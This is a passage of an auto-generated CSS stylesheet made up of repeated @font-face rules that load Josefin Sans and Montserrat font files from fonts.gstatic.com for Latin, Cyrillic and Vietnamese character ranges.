U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUAnx4RHw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUA3x4RHw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUDXx4.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUAnx4RHw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUA3x4RHw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUDXx4.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUAnx4RHw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUA3x4RHw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUDXx4.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUAnx4RHw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUA3x4RHw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUDXx4.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUAnx4RHw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUA3x4RHw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUDXx4.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dJ9pQOi.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dJ9pQOi.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dJ9pQOi.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dJ9pQOi.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dJ9pQOi.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dJ9pQOi.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dJ9pQOi.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dJ9pQOi.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dJ9pQOi.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTn89ddpQ.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, 